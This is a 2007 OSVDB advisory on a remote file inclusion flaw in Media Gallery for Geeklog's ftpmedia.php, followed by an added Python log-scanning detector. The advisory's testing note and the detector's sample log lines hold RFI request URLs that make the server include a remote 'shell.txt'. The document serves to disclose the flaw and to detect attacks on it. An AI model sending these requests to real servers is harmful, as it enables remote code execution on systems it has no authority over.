Media Gallery for Geeklog maint/ftpmedia.php _MG_CONF[path_html] Variable Remote File Inclusion

2007-05-14T11:18:50
ID OSVDB:36239
Type osvdb
Reporter OSVDB
Modified 2007-05-14T11:18:50

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 1.4.8b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?
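A detection-side companion to the testing note above, added here as an example and not part of the OSVDB entry: it flags access-log requests to maint/ftpmedia.php that try to set _MG_CONF through the query string. The combined log format, the function names and the sample lines (192.0.2.x addresses, example.invalid host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "/maint/ftpmedia.php"
# With register_globals on, a request parameter named _MG_CONF[...] becomes a script variable.
PARAM_RE = re.compile(r"^_MG_CONF(\[|$)")
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

def classify(line):
    """Return None, 'override' or 'remote-include' for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Decode the path so percent-encoding cannot hide the script name.
    if not unquote(url.path).lower().endswith(SCRIPT):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B/%5D brackets still match.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if PARAM_RE.match(name):
            if REMOTE_RE.match(value):
                return "remote-include"   # value points at a remote URL
            verdict = "override"          # config variable set from the request
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines, not taken from any real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2007:11:02:01 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://example.invalid/shell.txt? HTTP/1.0" 200 512',
    '192.0.2.11 - - [14/May/2007:11:02:05 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF%5Bpath_html%5D=http%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [14/May/2007:11:03:00 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=/tmp/ HTTP/1.1" 200 300',
    '192.0.2.13 - - [14/May/2007:11:04:00 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php HTTP/1.1" 200 900',
    '192.0.2.14 - - [14/May/2007:11:05:00 +0000] "GET /index.php?_MG_CONF[path_html]=x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Parameters sent in a POST body or a cookie do not appear in the request line, so this check covers query-string requests only.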

References:

Secunia Advisory ID: 25272
ISS X-Force ID: 34294
Generic Exploit URL: http://www.milw0rm.com/exploits/3924
FrSIRT Advisory: ADV-2007-1827
CVE-2007-2706
Bugtraq ID: 23983